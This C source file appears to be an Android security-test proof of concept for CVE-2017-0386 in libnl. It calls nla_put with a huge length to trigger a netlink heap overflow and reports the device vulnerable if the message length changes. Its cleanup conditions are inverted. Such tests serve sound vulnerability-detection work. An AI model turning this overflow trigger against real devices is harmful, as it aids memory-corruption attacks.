1 /** 2 * Copyright (C) 2019 The Android Open Source Project 3 * 4 * Licensed under the Apache License, Version 2.0 (the "License"); 5 * you may not use this file except in compliance with the License. 6 * You may obtain a copy of the License at 7 * 8 * http://www.apache.org/licenses/LICENSE-2.0 9 * 10 * Unless required by applicable law or agreed to in writing, software 11 * distributed under the License is distributed on an "AS IS" BASIS, 12 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 * See the License for the specific language governing permissions and 14 * limitations under the License. 15 */ 16 #define _GNU_SOURCE 17 18 #define LOG_TAG "CVE-2017-0386" 19 20 #include <sys/wait.h> 21 #include <sys/types.h> 22 #include <stdio.h> 23 #include <log/log.h> 24 #include <netlink/msg.h> 25 #include <netlink/netlink.h> 26 #include <netlink-private/object-api.h> 27 #include <netlink-private/types.h> 28 #include <netlink/object.h> 29 #include <netlink/attr.h> 30 31 #include "../includes/common.h" 32 33 int main(void) { 34 struct nl_msg *message = NULL; 35 struct nlmsghdr *hdr; 36 char *data = NULL; 37 uint32_t result = 0; 38 int ret = EXIT_SUCCESS; 39 int pagesize = getpagesize(); 40 size_t payloadlength = pagesize + 12 - 0x30; 41 size_t payload2length = pagesize; 42 43 message = nlmsg_alloc(); 44 if (message == NULL) { 45 ALOGE("Alloc message memory failed"); 46 return EXIT_FAILURE; 47 } 48 49 ALOGI("nl_msg.nm_size : %zx\n", message->nm_size); 50 hdr = message->nm_nlh; 51 52 //allocate memory for data with payloadlength 53 data = malloc(payloadlength); 54 if (data == NULL) { 55 ALOGE("Alloc data memory failed"); 56 nlmsg_free(message); 57 return EXIT_FAILURE; 58 } 59 60 memset(data, 0x41, payloadlength); 61 nla_put(message, 0x4444, payloadlength, data); 62 result = hdr->nlmsg_len; 63 ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr)); 64 ALOGI("message len = 0x%x", result); 65 66 free(data); 67 data = NULL; 68 69 //allocate memory for data with payload2length 70 data = malloc(payload2length); 71 if (data == NULL) { 72 ALOGE("Alloc data2 memory failed"); 73 nlmsg_free(message); 74 return EXIT_FAILURE; 75 } 76 memset(data, 0x33, payload2length); 77 ALOGI("\n\n\nPutting down overflow.......\n\n\n"); 78 nla_put(message, 0x8888, 0xFFFFF000, data); 79 80 ALOGI("message address [%p, %p]", hdr, nlmsg_tail(hdr)); 81 ALOGI("message len = 0x%x", hdr->nlmsg_len); 82 83 /* 84 * return 113 error code if length is mismatch 85 */ 86 if(result != hdr->nlmsg_len) { 87 ret = EXIT_VULNERABLE; 88 } 89 90 if(!data) { 91 free(data); 92 data = NULL; 93 } 94 95 if(!message) { 96 nlmsg_free(message); 97 message = NULL; 98 } 99 return ret; 100 } 101
